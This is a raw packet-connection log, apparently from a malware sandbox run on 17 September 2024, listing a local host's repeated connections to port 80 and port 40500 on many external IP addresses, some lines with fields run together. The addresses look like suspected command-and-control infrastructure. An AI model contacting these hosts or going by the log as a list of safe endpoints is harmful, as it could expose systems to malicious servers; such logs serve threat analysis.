                                            Sep 17, 2024 23:10:39.746872902 CEST4976480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:39.751995087 CEST8049764185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:10:39.752902031 CEST4976480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:39.759188890 CEST4976480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:39.762125015 CEST8049762185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:10:39.762197018 CEST4976280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:39.764000893 CEST8049764185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:10:40.456398010 CEST8049764185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:10:40.456562996 CEST4976480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:42.443083048 CEST4976540500192.168.2.4109.74.69.43
                                            Sep 17, 2024 23:10:42.448662996 CEST4050049765109.74.69.43192.168.2.4
Sep 17, 2024 23:10:42.448911905 CEST  49765  40500  192.168.2.4  109.74.69.43
Sep 17, 2024 23:10:42.450220108 CEST  49765  40500  192.168.2.4  109.74.69.43
Sep 17, 2024 23:10:42.455123901 CEST  40500  49765  109.74.69.43  192.168.2.4
Sep 17, 2024 23:10:42.455187082 CEST  49765  40500  192.168.2.4  109.74.69.43
Sep 17, 2024 23:10:42.456279993 CEST  49765  40500  192.168.2.4  109.74.69.43
Sep 17, 2024 23:10:42.460186958 CEST  40500  49765  109.74.69.43  192.168.2.4
Sep 17, 2024 23:10:42.489393950 CEST  49764  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:42.489748955 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:42.494620085 CEST  80  49766  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:42.494760990 CEST  80  49764  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:42.494847059 CEST  49764  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:42.494857073 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:42.495062113 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:42.499876022 CEST  80  49766  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:42.503612995 CEST  49756  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:10:42.505311966 CEST  40500  49765  109.74.69.43  192.168.2.4
Sep 17, 2024 23:10:42.520539045 CEST  80  49756  91.202.233.141  192.168.2.4
Sep 17, 2024 23:10:42.521042109 CEST  49756  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:10:43.194051027 CEST  80  49766  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:43.194117069 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:43.724510908 CEST  40500  49755  217.30.160.154  192.168.2.4
Sep 17, 2024 23:10:43.724581003 CEST  49755  40500  192.168.2.4  217.30.160.154
Sep 17, 2024 23:10:45.224131107 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:45.224555016 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:45.229749918 CEST  80  49766  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:45.229793072 CEST  80  49767  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:45.229800940 CEST  49766  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:45.229867935 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:45.230056047 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:45.235003948 CEST  80  49767  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:46.044327974 CEST  80  49767  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:46.044399977 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:47.457194090 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:10:47.492254972 CEST  40500  49768  88.204.209.230  192.168.2.4
Sep 17, 2024 23:10:47.492566109 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:10:47.493586063 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:10:47.498608112 CEST  40500  49768  88.204.209.230  192.168.2.4
Sep 17, 2024 23:10:47.498661041 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:10:47.503156900 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:10:47.504220009 CEST  40500  49768  88.204.209.230  192.168.2.4
Sep 17, 2024 23:10:47.549684048 CEST  40500  49768  88.204.209.230  192.168.2.4
Sep 17, 2024 23:10:48.067502022 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:48.067945957 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:48.073070049 CEST  80  49769  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:48.073112011 CEST  80  49767  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:48.073157072 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:48.073180914 CEST  49767  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:48.073307037 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:48.078380108 CEST  80  49769  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:48.725198030 CEST  40500  49757  89.106.236.58  192.168.2.4
Sep 17, 2024 23:10:48.727966070 CEST  49757  40500  192.168.2.4  89.106.236.58
Sep 17, 2024 23:10:48.783287048 CEST  80  49769  185.215.113.66  192.168.2.4
Sep 17, 2024 23:10:48.784909964 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:10:51.835747957 CEST  49770  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:51.840787888 CEST  80  49770  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:51.841044903 CEST  49770  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:51.841388941 CEST  49770  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:51.846342087 CEST  80  49770  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:52.519817114 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:10:52.525342941 CEST  40500  49771  2.182.190.8  192.168.2.4
Sep 17, 2024 23:10:52.525429010 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:10:52.527546883 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:10:52.532495022 CEST  40500  49771  2.182.190.8  192.168.2.4
Sep 17, 2024 23:10:52.532562017 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:10:52.534425974 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:10:52.537374973 CEST  40500  49771  2.182.190.8  192.168.2.4
Sep 17, 2024 23:10:52.585427046 CEST  40500  49771  2.182.190.8  192.168.2.4
Sep 17, 2024 23:10:53.491450071 CEST  80  49770  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:53.491642952 CEST  49770  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:53.491642952 CEST  49770  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:53.496612072 CEST  80  49770  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:53.788377047 CEST  40500  49760  46.35.93.221  192.168.2.4
Sep 17, 2024 23:10:53.788490057 CEST  49760  40500  192.168.2.4  46.35.93.221
Sep 17, 2024 23:10:55.520956039 CEST  49772  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:55.673717022 CEST  80  49772  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:55.673837900 CEST  49772  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:55.674081087 CEST  49772  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:55.679466009 CEST  80  49772  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:57.334342957 CEST  80  49772  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:57.334445000 CEST  49772  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:57.334556103 CEST  49772  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:57.339426041 CEST  80  49772  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:57.535094976 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:10:57.540087938 CEST  40500  49773  139.135.146.244  192.168.2.4
Sep 17, 2024 23:10:57.540184975 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:10:57.541589975 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:10:57.546394110 CEST  40500  49773  139.135.146.244  192.168.2.4
Sep 17, 2024 23:10:57.546463966 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:10:57.550050974 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:10:57.551332951 CEST  40500  49773  139.135.146.244  192.168.2.4
Sep 17, 2024 23:10:57.597378016 CEST  40500  49773  139.135.146.244  192.168.2.4
Sep 17, 2024 23:10:58.791357040 CEST  40500  49763  194.93.26.70  192.168.2.4
Sep 17, 2024 23:10:58.791450977 CEST  49763  40500  192.168.2.4  194.93.26.70
Sep 17, 2024 23:10:59.366014957 CEST  49774  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:59.371085882 CEST  80  49774  77.91.77.92  192.168.2.4
Sep 17, 2024 23:10:59.371164083 CEST  49774  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:59.371454954 CEST  49774  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:10:59.376605988 CEST  80  49774  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:01.040229082 CEST  80  49774  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:01.041076899 CEST  49774  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:01.041076899 CEST  49774  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:01.046366930 CEST  80  49774  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:02.550653934 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:02.556222916 CEST  40500  49775  185.131.88.152  192.168.2.4
Sep 17, 2024 23:11:02.556339025 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:02.557430983 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:02.562294006 CEST  40500  49775  185.131.88.152  192.168.2.4
Sep 17, 2024 23:11:02.562346935 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:02.565680027 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:02.567302942 CEST  40500  49775  185.131.88.152  192.168.2.4
Sep 17, 2024 23:11:02.613353968 CEST  40500  49775  185.131.88.152  192.168.2.4
Sep 17, 2024 23:11:03.067356110 CEST  49776  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:03.072228909 CEST  80  49776  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:03.072293043 CEST  49776  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:03.072380066 CEST  49776  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:03.077394009 CEST  80  49776  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:03.818876028 CEST  40500  49765  109.74.69.43  192.168.2.4
Sep 17, 2024 23:11:03.820031881 CEST  49765  40500  192.168.2.4  109.74.69.43
Sep 17, 2024 23:11:04.737078905 CEST  80  49776  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:04.737216949 CEST  49776  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:04.764403105 CEST  49776  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:04.769249916 CEST  80  49776  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:06.786448956 CEST  49777  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:06.791363955 CEST  80  49777  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:06.791425943 CEST  49777  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:06.791554928 CEST  49777  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:06.796390057 CEST  80  49777  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:07.582319975 CEST  49778  40500  192.168.2.4  178.217.173.26
Sep 17, 2024 23:11:07.588871002 CEST  40500  49778  178.217.173.26  192.168.2.4
Sep 17, 2024 23:11:07.591492891 CEST  49778  40500  192.168.2.4  178.217.173.26
Sep 17, 2024 23:11:07.595788002 CEST  49778  40500  192.168.2.4  178.217.173.26
Sep 17, 2024 23:11:07.597039938 CEST  49778  40500  192.168.2.4  178.217.173.26
Sep 17, 2024 23:11:07.600950956 CEST  40500  49778  178.217.173.26  192.168.2.4
Sep 17, 2024 23:11:07.645544052 CEST  40500  49778  178.217.173.26  192.168.2.4
Sep 17, 2024 23:11:08.097232103 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:11:08.102499008 CEST  80  49769  185.215.113.66  192.168.2.4
Sep 17, 2024 23:11:08.103508949 CEST  49769  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:11:08.443919897 CEST  80  49777  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:08.444056988 CEST  49777  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:08.444103956 CEST  49777  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:08.449333906 CEST  80  49777  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:08.865901947 CEST  40500  49768  88.204.209.230  192.168.2.4
Sep 17, 2024 23:11:08.865952969 CEST  49768  40500  192.168.2.4  88.204.209.230
Sep 17, 2024 23:11:10.473984957 CEST  49779  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:10.478941917 CEST  80  49779  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:10.479037046 CEST  49779  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:10.479190111 CEST  49779  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:10.484378099 CEST  80  49779  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:12.115855932 CEST  80  49779  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:12.115916967 CEST  49779  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:12.290709019 CEST  49779  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:11:12.296036959 CEST  80  49779  77.91.77.92  192.168.2.4
Sep 17, 2024 23:11:12.613312960 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:12.618321896 CEST  40500  49780  189.134.7.239  192.168.2.4
Sep 17, 2024 23:11:12.618520975 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:12.619585991 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:12.624494076 CEST  40500  49780  189.134.7.239  192.168.2.4
Sep 17, 2024 23:11:12.624552965 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:12.628997087 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:12.629367113 CEST  40500  49780  189.134.7.239  192.168.2.4
Sep 17, 2024 23:11:12.677337885 CEST  40500  49780  189.134.7.239  192.168.2.4
Sep 17, 2024 23:11:13.898479939 CEST  40500  49771  2.182.190.8  192.168.2.4
Sep 17, 2024 23:11:13.900964022 CEST  49771  40500  192.168.2.4  2.182.190.8
Sep 17, 2024 23:11:15.445777893 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:15.450714111 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:15.450800896 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:15.450918913 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:15.455755949 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.142934084 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.142959118 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.142972946 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.142987013 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.142993927 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143003941 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143018961 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143019915 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143032074 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143045902 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143060923 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143083096 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143498898 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143513918 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.143534899 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143546104 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143878937 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.143892050 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.147854090 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.147908926 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:16.148838043 CEST  80  49781  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:16.148875952 CEST  49781  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.162252903 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.167094946 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.167273045 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.167273045 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.172111034 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.644561052 CEST  49783  40500  192.168.2.4  31.25.131.226
Sep 17, 2024 23:11:17.848402977 CEST  40500  49783  31.25.131.226  192.168.2.4
Sep 17, 2024 23:11:17.851715088 CEST  49783  40500  192.168.2.4  31.25.131.226
Sep 17, 2024 23:11:17.853007078 CEST  49783  40500  192.168.2.4  31.25.131.226
Sep 17, 2024 23:11:17.857913017 CEST  40500  49783  31.25.131.226  192.168.2.4
Sep 17, 2024 23:11:17.859571934 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859601021 CEST  49783  40500  192.168.2.4  31.25.131.226
Sep 17, 2024 23:11:17.859657049 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859673023 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859805107 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.859806061 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.859930992 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859945059 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859960079 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.859975100 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.860070944 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.860070944 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.860306978 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.860323906 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.860338926 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.860481024 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.860481024 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.862684965 CEST  49783  40500  192.168.2.4  31.25.131.226
Sep 17, 2024 23:11:17.864526987 CEST  40500  49783  31.25.131.226  192.168.2.4
Sep 17, 2024 23:11:17.864559889 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:17.864628077 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:17.909380913 CEST  40500  49783  31.25.131.226  192.168.2.4
Sep 17, 2024 23:11:18.881478071 CEST  40500  49773  139.135.146.244  192.168.2.4
Sep 17, 2024 23:11:18.881567001 CEST  49773  40500  192.168.2.4  139.135.146.244
Sep 17, 2024 23:11:22.863308907 CEST  49784  40500  192.168.2.4  178.90.87.64
Sep 17, 2024 23:11:22.868328094 CEST  40500  49784  178.90.87.64  192.168.2.4
Sep 17, 2024 23:11:22.868484974 CEST  49784  40500  192.168.2.4  178.90.87.64
Sep 17, 2024 23:11:22.869652987 CEST  49784  40500  192.168.2.4  178.90.87.64
Sep 17, 2024 23:11:22.874437094 CEST  40500  49784  178.90.87.64  192.168.2.4
Sep 17, 2024 23:11:22.875170946 CEST  49784  40500  192.168.2.4  178.90.87.64
Sep 17, 2024 23:11:22.878333092 CEST  49784  40500  192.168.2.4  178.90.87.64
Sep 17, 2024 23:11:22.879967928 CEST  40500  49784  178.90.87.64  192.168.2.4
Sep 17, 2024 23:11:22.925389051 CEST  40500  49784  178.90.87.64  192.168.2.4
Sep 17, 2024 23:11:23.969578028 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:23.970062017 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:23.974708080 CEST  80  49782  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:23.974756002 CEST  49782  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:23.975193977 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:23.975248098 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:23.975404978 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:23.980185032 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.054464102 CEST  40500  49775  185.131.88.152  192.168.2.4
Sep 17, 2024 23:11:24.054527998 CEST  49775  40500  192.168.2.4  185.131.88.152
Sep 17, 2024 23:11:24.665081978 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665101051 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665111065 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665119886 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665131092 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665141106 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665152073 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665170908 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:24.665215969 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:24.665220022 CEST  80  49785  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:24.665735006 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:24.665766954 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:24.665766954 CEST  49785  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:26.709548950 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:26.714562893 CEST  80  49786  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:26.714669943 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:26.714817047 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:26.719640017 CEST  80  49786  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:27.404637098 CEST  80  49786  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:27.404855967 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:27.878793955 CEST  49787  40500  192.168.2.4  185.194.125.74
Sep 17, 2024 23:11:27.884053946 CEST  40500  49787  185.194.125.74  192.168.2.4
Sep 17, 2024 23:11:27.884146929 CEST  49787  40500  192.168.2.4  185.194.125.74
Sep 17, 2024 23:11:27.885988951 CEST  49787  40500  192.168.2.4  185.194.125.74
Sep 17, 2024 23:11:27.891092062 CEST  40500  49787  185.194.125.74  192.168.2.4
Sep 17, 2024 23:11:27.891169071 CEST  49787  40500  192.168.2.4  185.194.125.74
Sep 17, 2024 23:11:27.893856049 CEST  49787  40500  192.168.2.4  185.194.125.74
Sep 17, 2024 23:11:27.896085024 CEST  40500  49787  185.194.125.74  192.168.2.4
Sep 17, 2024 23:11:27.941406965 CEST  40500  49787  185.194.125.74  192.168.2.4
Sep 17, 2024 23:11:28.946716070 CEST  40500  49778  178.217.173.26  192.168.2.4
Sep 17, 2024 23:11:28.946866989 CEST  49778  40500  192.168.2.4  178.217.173.26
Sep 17, 2024 23:11:29.426810980 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:29.427145004 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:29.434551954 CEST  80  49786  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:29.434684038 CEST  49786  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:29.435009956 CEST  80  49788  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:29.435089111 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:29.435178995 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:29.441013098 CEST  80  49788  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:30.236568928 CEST  80  49788  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:30.236762047 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.255641937 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.256064892 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.275820017 CEST  80  49789  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:32.277019024 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.277194023 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.279618979 CEST  80  49788  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:32.279817104 CEST  49788  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:32.307910919 CEST  80  49789  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:32.910583973 CEST  49790  40500  192.168.2.4  151.240.79.133
Sep 17, 2024 23:11:32.921066999 CEST  40500  49790  151.240.79.133  192.168.2.4
Sep 17, 2024 23:11:32.924988985 CEST  49790  40500  192.168.2.4  151.240.79.133
Sep 17, 2024 23:11:32.927073002 CEST  49790  40500  192.168.2.4  151.240.79.133
Sep 17, 2024 23:11:32.936858892 CEST  40500  49790  151.240.79.133  192.168.2.4
Sep 17, 2024 23:11:32.940900087 CEST  49790  40500  192.168.2.4  151.240.79.133
Sep 17, 2024 23:11:33.002780914 CEST  40500  49790  151.240.79.133  192.168.2.4
Sep 17, 2024 23:11:33.049627066 CEST  80  49789  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:33.050770998 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:34.012903929 CEST  40500  49780  189.134.7.239  192.168.2.4
Sep 17, 2024 23:11:34.017086983 CEST  49780  40500  192.168.2.4  189.134.7.239
Sep 17, 2024 23:11:35.084425926 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:35.084825039 CEST  49791  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:35.092947960 CEST  80  49791  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:35.093027115 CEST  49791  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:35.093247890 CEST  49791  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:35.095999956 CEST  80  49789  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:35.096054077 CEST  49789  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:35.102078915 CEST  80  49791  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:35.895641088 CEST  80  49791  91.202.233.141  192.168.2.4
Sep 17, 2024 23:11:35.900979996 CEST  49791  80  192.168.2.4  91.202.233.141
Sep 17, 2024 23:11:37.957155943 CEST  49792  40500  192.168.2.4  2.135.128.182
Sep 17, 2024 23:11:37.977054119 CEST  40500  49792  2.135.128.182  192.168.2.4
Sep 17, 2024 23:11:37.977194071 CEST  49792  40500  192.168.2.4  2.135.128.182
Sep 17, 2024 23:11:37.981734991 CEST  49792  40500  192.168.2.4  2.135.128.182
Sep 17, 2024 23:11:37.987680912 CEST  49792  40500  192.168.2.4  2.135.128.182
Sep 17, 2024 23:11:37.996598005 CEST  40500  49792  2.135.128.182  192.168.2.4
